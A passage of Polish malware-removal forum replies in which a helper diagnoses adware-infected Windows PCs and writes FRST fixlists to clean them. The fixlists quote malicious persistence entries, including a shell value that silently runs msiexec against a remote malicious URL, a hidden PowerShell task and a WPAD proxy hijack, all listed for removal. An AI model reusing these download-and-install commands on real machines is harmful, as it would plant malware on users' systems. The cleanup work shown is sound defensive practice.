Miszel03

Posty łącze, - używaj opcji Edytuj. Co to za pomysł z ładowaniem raportu do postu? Albo załączniki, albo serwis wklejkowy (wklej.org), a już w drodze wyjątku do spoileru. Jeśli chodzi o sam raport to tak, teraz jest już poprawny i mogę przejść dalej. Wdrążam poprawki i skan antywirusowy. Już coraz bliżej końca. 1. Zagrożenia wykryte przez AdwCleaner usuń (za pomocą opcji Oczyść). 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Zoohair DeleteKey: HKEY_USERS\S-1-5-21-2039861284-1912394379-4038472862-1001\SOFTWARE\Zoohair DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Dayglad DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Firefox DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Firefox SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = C:\Users\Marcin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lenovo App Explorer.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 4. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Podsumuj również obecny stan systemu.

Gdzie jest raport FSS, o który prosiłem? Proszę dostarcz go, ja muszę mieć diagnostykę wingmt - inaczej Cię ze szpon nie wypuszczę Zastanawiam się czy Comodo Dragon ma jakieś powiązania z Google Chrome w czasie rzeczywistym na komputerze klietna (pomijam wspólny silnik). Niby CHR nie ma zainstalowanego, ale jest Comodo Dragon. W raportach widzę infekcję w CHR (= resztki w systemie, infekcja martwa) i myślę, czy przypadkiem nie ma przekazu danych..hmmm..wywal resztki po CHR i zobaczę. Kolorowo jeszcze nie jest, ale jest lepiej. 1. Zagrożenia wykryte przez AdwCleaner daj do usuwania (używając opcji Oczyść) - dostarcz następnie z tego raport. P.S: Zostanie podmieniony plik DNSAPI, bo ten jest zmodyfikowany przez infekcję. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Eastness DeleteKey: HKEY_USERS\S-1-5-21-499711634-606110142-1186871544-1001\Software\Eastness DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Moncar DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Firefox DeleteKey: HKEY_USERS\S-1-5-21-499711634-606110142-1186871544-1001\Software\Firefox HKU\S-1-5-21-499711634-606110142-1186871544-1001\...\Run: [rmwmrrqm] => C:\Users\KubaDamaszk\AppData\Roaming\gvuyqy\ymmrzit.exe********************************************************* [427008 2017-05-07] () RemoveDirectory: C:\Users\KubaDamaszk\AppData\Roaming\gvuyqy SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = R2 WANARE; C:\Users\KubaDamaszk\AppData\Local\WANARE\Snare.dll [826368 2017-05-05] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] RemoveDirectory: C:\Users\KubaDamaszk\AppData\Local\WANARE C:\Users\KubaDamaszk\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Program Files (x86)\Google C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\Users\User\AppData\Local\Google DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 4. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Podsumuj również obecny stan systemu.

Coś nie podoba mi się ten log z SearchReg, na pewno to cała jego zawartość?

W takim razie zawieszam diagnostykę malware, temat przenoszę do działu Hardware.

Pomiń pkt. 1 i usuń ze skryptu (pkt. 3) linijkę CMD: ipconfig /flushdns.

W raportach brak oznak infekcji. Drobną kosmetykę pomijam. Temat przenoszę do działu Windows 7.

Jak chyba w każdym przypadku na tym forum...adware, czyli sfałszowane przeglądarki (Mozilla FireFox oraz Google Chrome), złośliwe oprogramowanie w usułgach i prawdopodobnie infekcja BitCoinMiner. Do poczytania: KLIK. 1. Przez panel sterowania odinstaluj: Wątpliwe oprogramowanie / Scam: YAC(Yet Another Cleaner!). 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-499711634-606110142-1186871544-1001\...\ChromeHTML: -> "C:\Program Files (x86)\Eastness\Application\chrome.exe" "%1" RemoveDirectory: C:\Program Files (x86)\Eastness RemoveDirectory: C:\Users\KubaDamaszk\AppData\Local\Eastness Task: {2A344C53-DD60-40AD-A0AD-AFA562D9591D} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () Task: {7171A626-12B5-4F28-BF83-B82026429F86} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1 Task: {71A357B2-5547-477F-AD72-150222197674} - \SteamClient -> Brak pliku RemoveDirectory: C:\Program Files (x86)\MIO ShortcutWithArgument: C:\Users\KubaDamaszk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493101209&z=f906ed2ef894f2ac480ec08gfz3tbc6g3e6gfo9o7t&from=che0812&uid=TOSHIBAXMQ01ABF050_Z3LTC8BPTXXZ3LTC8BPT HKU\S-1-5-21-499711634-606110142-1186871544-1001\...\Run: [background_fault] => C:\Users\KubaDamaszk\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) HKU\S-1-5-21-499711634-606110142-1186871544-1001\...\Policies\Explorer\Run: [Clients] => C:\Users\KubaDamaszk\AppData\Roaming\Microsoft\svbietti\wvrcgeii.exe HKU\S-1-5-21-499711634-606110142-1186871544-1001\...\Run: [rmwmrrqm] => C:\Users\KubaDamaszk\AppData\Roaming\gvuyqy\ymmrzit.exe [427008 2017-01-20] (hEX-rays sA) C:\Users\KubaDamaszk\AppData\Roaming\Microsoft\svbietti C:\Users\KubaDamaszk\AppData\Roaming\gvuyqy ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493101209&z=f906ed2ef894f2ac480ec08gfz3tbc6g3e6gfo9o7t&from=che0812&uid=TOSHIBAXMQ01ABF050_Z3LTC8BPTXXZ3LTC8BPT HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493101209&z=f906ed2ef894f2ac480ec08gfz3tbc6g3e6gfo9o7t&from=che0812&uid=TOSHIBAXMQ01ABF050_Z3LTC8BPTXXZ3LTC8BPT HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493101209&z=f906ed2ef894f2ac480ec08gfz3tbc6g3e6gfo9o7t&from=che0812&uid=TOSHIBAXMQ01ABF050_Z3LTC8BPTXXZ3LTC8BPT&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493101209&z=f906ed2ef894f2ac480ec08gfz3tbc6g3e6gfo9o7t&from=che0812&uid=TOSHIBAXMQ01ABF050_Z3LTC8BPTXXZ3LTC8BPT&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493101209&z=f906ed2ef894f2ac480ec08gfz3tbc6g3e6gfo9o7t&from=che0812&uid=TOSHIBAXMQ01ABF050_Z3LTC8BPTXXZ3LTC8BPT HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493101209&z=f906ed2ef894f2ac480ec08gfz3tbc6g3e6gfo9o7t&from=che0812&uid=TOSHIBAXMQ01ABF050_Z3LTC8BPTXXZ3LTC8BPT HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493101209&z=f906ed2ef894f2ac480ec08gfz3tbc6g3e6gfo9o7t&from=che0812&uid=TOSHIBAXMQ01ABF050_Z3LTC8BPTXXZ3LTC8BPT&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493101209&z=f906ed2ef894f2ac480ec08gfz3tbc6g3e6gfo9o7t&from=che0812&uid=TOSHIBAXMQ01ABF050_Z3LTC8BPTXXZ3LTC8BPT&q={searchTerms} HKU\S-1-5-21-499711634-606110142-1186871544-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493101209&z=f906ed2ef894f2ac480ec08gfz3tbc6g3e6gfo9o7t&from=che0812&uid=TOSHIBAXMQ01ABF050_Z3LTC8BPTXXZ3LTC8BPT HKU\S-1-5-21-499711634-606110142-1186871544-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493101209&z=f906ed2ef894f2ac480ec08gfz3tbc6g3e6gfo9o7t&from=che0812&uid=TOSHIBAXMQ01ABF050_Z3LTC8BPTXXZ3LTC8BPT SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493101209&z=f906ed2ef894f2ac480ec08gfz3tbc6g3e6gfo9o7t&from=che0812&uid=TOSHIBAXMQ01ABF050_Z3LTC8BPTXXZ3LTC8BPT&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493101209&z=f906ed2ef894f2ac480ec08gfz3tbc6g3e6gfo9o7t&from=che0812&uid=TOSHIBAXMQ01ABF050_Z3LTC8BPTXXZ3LTC8BPT&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493101209&z=f906ed2ef894f2ac480ec08gfz3tbc6g3e6gfo9o7t&from=che0812&uid=TOSHIBAXMQ01ABF050_Z3LTC8BPTXXZ3LTC8BPT&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493101209&z=f906ed2ef894f2ac480ec08gfz3tbc6g3e6gfo9o7t&from=che0812&uid=TOSHIBAXMQ01ABF050_Z3LTC8BPTXXZ3LTC8BPT&q={searchTerms} SearchScopes: HKLM-x32 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms} SearchScopes: HKU\S-1-5-21-499711634-606110142-1186871544-1001 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493101209&z=f906ed2ef894f2ac480ec08gfz3tbc6g3e6gfo9o7t&from=che0812&uid=TOSHIBAXMQ01ABF050_Z3LTC8BPTXXZ3LTC8BPT&q={searchTerms} SearchScopes: HKU\S-1-5-21-499711634-606110142-1186871544-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493101209&z=f906ed2ef894f2ac480ec08gfz3tbc6g3e6gfo9o7t&from=che0812&uid=TOSHIBAXMQ01ABF050_Z3LTC8BPTXXZ3LTC8BPT&q={searchTerms} StartMenuInternet: IEXPLORE.EXE - c:\program files (x86)\internet explorer\iexplore.exe hxxp://www.ourluckysites.com/?type=sc&ts=1493978750&z=0b48d84dc5d8f85af5fe25egaz0t0cetdmeb0m7w2z&from=che0812&uid=TOSHIBAXMQ01ABF050_Z3LTC8BPTXXZ3LTC8BPT HKU\S-1-5-21-499711634-606110142-1186871544-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe S2 3DM; C:\Users\KubaDamaszk\AppData\Local\3DM\Kitty.dll [754688 2017-04-19] (kitty.exe) [brak podpisu cyfrowego] R2 AppleAzureSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [106496 2017-04-17] () [brak podpisu cyfrowego] R2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [106496 2017-04-17] () [brak podpisu cyfrowego] S2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-04] (windows) [brak podpisu cyfrowego] R2 clean; C:\Users\KubaDamaszk\AppData\Local\clean\Kyubey.exe [114688 2017-04-06] () [brak podpisu cyfrowego] R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [102400 2017-04-28] () [brak podpisu cyfrowego] R2 Kitty; C:\Users\KubaDamaszk\AppData\Local\Kitty\Kitty.dll [124928 2017-05-04] (kitty) [brak podpisu cyfrowego] R2 Kyubey; C:\Users\KubaDamaszk\AppData\Roaming\Kyubey\Kyubey.exe [236032 2017-04-01] () [brak podpisu cyfrowego] R2 SNARER; C:\Users\KubaDamaszk\AppData\Local\SNARER\Snarer.dll [792576 2017-04-11] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 WinSAPSvc; C:\Users\KubaDamaszk\AppData\Roaming\WinSAPSvc\WinSAP.dll [603648 2017-05-05] (WinSAP) [brak podpisu cyfrowego] R2 WINSNARE; C:\Users\KubaDamaszk\AppData\Roaming\WINSNARE\WinSnare.dll [1291776 2017-04-05] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] U0 aswVmm; Brak ImagePath C:\ProgramData\BIT C:\Users\KubaDamaszk\AppData\Local\clean C:\Users\KubaDamaszk\AppData\Local\Kitty C:\Users\KubaDamaszk\AppData\Roaming\Kyubey C:\Users\KubaDamaszk\AppData\Local\SNARER C:\Users\KubaDamaszk\AppData\Roaming\WinSAPSv C:\Users\KubaDamaszk\AppData\Roaming\WINSNARE 2017-04-05 18:39 - 2017-04-05 18:39 - 00000000 ____D C:\Users\KubaDamaszk\AppData\Local\Moncar RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\KubaDamaszk\AppData\Roaming\Firefox RemoveDirectory: C:\Users\KubaDamaszk\AppData\Local\Firefox DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\KubaDamaszk\AppData\Local\Mozilla C:\Users\KubaDamaszk\AppData\Roaming\Mozilla C:\Users\KubaDamaszk\AppData\Roaming\Profiles CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\Kris\AppData\Local CMD: dir /a C:\Users\Kris\AppData\LocalLow CMD: dir /a C:\Users\Kris\AppData\Roaming EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 4. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). eastness;moncar;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 5. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Dodatkowo pokaż jak wygląda stan wszystkich usług: KLIK.

Przeglądarki Google Chrome i Mozilla FireFox zostały sfałszowane. Adware zmodyfikowało skróty oraz usługi uruchamiania. Wiesz dlaczego tutaj jesteś? To ja ci powiem. Pobierasz programy po przez serwis DobreProgramy, który udostępnia Asystenta Pobierania, który ( ) ma w sobie zintegrowany moduł instalacji adware. Poczytać proszę: Portale z oprogramowaniem / Instalatory - na co uważać. 1. Przez panel sterowania odinstaluj: Przestarzałe oprogramowanie: Spybot - Search & Destroy. Zbędniki / Sponsorzy Instalacyjni: McAfee Security Scan Plus. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-2039861284-1912394379-4038472862-1001\...\ChromeHTML: -> C:\Program Files (x86)\Zoohair\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Zoohair RemoveDirectory: C:\Users\Marcin\AppData\Local\Zoohair Task: {62C2A93F-65B2-4CCA-BAB1-7A5CD41852B7} - \Anuseledriggh -> Brak pliku Task: {AA9D2DEE-CC18-4829-A7A7-C32F5DB9E246} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1 Task: {BC94716A-83F8-44CC-91CF-7358464006BA} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-05] () RemoveDirectory: C:\Program Files (x86)\MIO C:\Users\Marcin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk ShortcutWithArgument: C:\Users\Marcin\Desktop\BigFarm.lnk -> C:\Program Files (x86)\Zoohair\Application\chrome.exe (Google Inc.) -> hxxp://bigfarm.goodgamestudios.com/?w=239064 FirewallRules: [{994ADBD4-409F-4B4B-A11E-D7AF4BEFECC2}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{C626913D-8E2F-45BF-B292-4DDD75A6F9FD}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe FirewallRules: [{A76C5247-2D97-4714-B900-3892B9BFE63A}] => (Allow) C:\Program Files (x86)\Zoohair\Application\chrome.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Marcin\AppData\Roaming\Firefox RemoveDirectory: C:\Users\Marcin\AppData\Local\Firefox HKU\S-1-5-21-2039861284-1912394379-4038472862-1001\...\Run: [background_fault] => C:\Users\Marcin\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) C:\Users\Marcin\AppData\Local\background_fault\aswRD.exe Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X] SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = HKU\S-1-5-21-2039861284-1912394379-4038472862-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Zoohair\Application\chrome.exe (Google Inc.) R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-05] (windows) [brak podpisu cyfrowego] R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [107672 2017-05-03] () R2 IISvr; C:\ProgramData\Package Cache\{59399776-575D-9C54-E861-0D5EAB7E707D}v10.1.14393.795\Installers\IIS\iisexp.dll [105472 2017-05-04] () [brak podpisu cyfrowego] R2 Kitty; C:\Users\Marcin\AppData\Local\Kitty\Kitty.dll [124928 2017-05-04] (kitty) [brak podpisu cyfrowego] R2 SNAREA; C:\Users\Marcin\AppData\Local\SNAREA\Snare.dll [826368 2017-05-03] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 WinSAPSvc; C:\Users\Marcin\AppData\Roaming\WinSAPSvc\WinSAP.dll [603648 2017-05-05] (WinSAP) [brak podpisu cyfrowego] R2 WANARE; C:\Users\Marcin\AppData\Local\WANARE\Snare.dll [826368 2017-05-05] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 MicrosoftCRLSrv; C:\ProgramData\Microsoft\IdentityCRL\production\ppcrlconfig617.dll [X] R1 p1490019505am; C:\Users\Marcin\AppData\Local\Temp\bk8332.tmp\p1490019505am.sys [746960 2017-03-20] (一普明为（北京）信息技术有限公司) S3 mfeaack01; \Device\mfeaack01.sys [X] C:\ProgramData\BIT C:\ProgramData\Package Cache C:\Users\Marcin\AppData\Local\Kitty C:\Users\Marcin\AppData\Local\SNAREA C:\Users\Marcin\AppData\Roaming\WinSAPSvc C:\Users\Marcin\AppData\Local\WANARE C:\Users\Marcin\Desktop\BigFarm.lnk C:\Users\Marcin\AppData\Local\Dayglad 2017-05-05 04:57 - 2017-05-05 04:57 - 01212728 _____ (Kacamife ) C:\Users\Marcin\Downloads\Spybot-Search-Destroy-12546-AsystentPobierania(1).exe 2017-05-05 04:50 - 2017-05-05 04:50 - 01212728 _____ (Kacamife ) C:\Users\Marcin\Downloads\SpywareBlaster-12693-AsystentPobierania.exe 2017-05-04 20:41 - 2017-05-04 20:42 - 01212728 _____ (Kacamife ) C:\Users\Marcin\Downloads\Spybot-Search-Destroy-12546-AsystentPobierania.exe DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Marcin\AppData\Local\Mozilla C:\Users\Marcin\AppData\Roaming\Mozilla C:\Users\Marcin\AppData\Roaming\Profiles CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\Marcin\AppData\Local CMD: dir /a C:\Users\Marcin\AppData\LocalLow CMD: dir /a C:\Users\Marcin\AppData\Roaming EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. Ustaw tą przeglądarkę jako domyślną, by cofnąć modyfikacje infekcji. 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). zoohair;dayglad;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 6. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Nie będę ukrywać, że system jest w stanie agonalnym. Masa infekcji adware / PUP. Zainfekowany został nie tylko system, a również i router (ustawione zostały litewskie adresy - KLIK). Przypuszczalnie na kązdym urządzeniu w tej sieci mogą dziać się różne anomalia w postaci wyskakujących reklam. Sfałszowane też zostały przeglądarki Mozilla FireFox oraz Google Chrome. O skrótach i innych modyfikacjach już nie wspominam. Postaram się to doprowadzić do porządku, ale uprzedzam: łatwo nie będzie. Lektura obowiązkowa, jak nie przeczytasz to grasz nie fair: KLIK. Znajomość zweryfikuję po tym czy pojawisz się w tym dziale z nowymi problemami 1. Zaloguj się do routera: Zmień ustawienia DNS. Jeśli nie wiesz na jakie, możesz ustawić adresy Google: 8.8.8.8 + 8.8.4.4 Zabezpiecz router: zmień hasło oraz zamknij dostęp do panelu zarządzania od strony Internetu. Porównaj z tymi artykułami: KLIK, KLIK. Po konfiguracji uruchom ten test mający potwierdzić zabezpieczenie: KLIK. Dopiero gdy router zostanie wyczyszczony i zabezpieczony: 2. Przez panel sterowania odinstaluj: Kontrowersyjne oprogramowanie, nierekomendowane: Plumbytes Anti-malware. 3. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {21CCB704-AB01-427E-B904-3590081354CD} - \SystemToolsDailyTest -> Brak pliku Task: {671B90D7-2821-4376-85F7-7D3B5FE6EACA} - \Milimili -> Brak pliku Task: {67E32AC8-0D22-4518-BD83-6999DE3BD7AC} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1 ShortcutWithArgument: C:\Users\Kris\Desktop\Software\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxps://launchpage.org/?uid=oTlKGKjdhx1sXu8CuYCS%2BMYEvNgv7FP7Xd2TZZRXRwYgKOyPaM9Tqsu%2FMvPi8wooPyk%3Dhoi Winlogon\Notify\igfxcui: HKU\S-1-5-21-3990190956-98265678-2498883457-1001\...\Run: [background_fault] => C:\Users\Kris\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) C:\Users\Kris\AppData\Local\background_fault\aswRD.exe HKU\S-1-5-21-3990190956-98265678-2498883457-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1YFjwdRkJSM8NLOThLNjJWMWH5MjFxMdw3RWLLRTEyRq== /q HKU\S-1-5-21-3990190956-98265678-2498883457-1001\...\Policies\Explorer: [] \HKU\S-1-5-18\...\RunOnce: [panda4_2dn] => reg.exe delete "HKCU\Software\AppDataLow\Software\panda4_2dn" /f HKU\S-1-5-18\...\RunOnce: [panda] => reg.exe delete "HKCU\Software\AppDataLow\Software\panda" /f HKU\S-1-5-18\...\RunOnce: [panda_XP] => reg.exe delete "HKCU\Software\panda" /f IFEO\DisplaySwitch.exe: [Debugger] GroupPolicy-x32: Ograniczenia GroupPolicyScripts-x32: Ograniczenia AutoConfigURL: [s-1-5-21-3990190956-98265678-2498883457-1001] => hxxp://unstop.net/wpad.dat?1c5640c07748c6328723300d1080fb3530481844 ManualProxies: 0hxxp://unstop.net/wpad.dat?1c5640c07748c6328723300d1080fb3530481844 HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 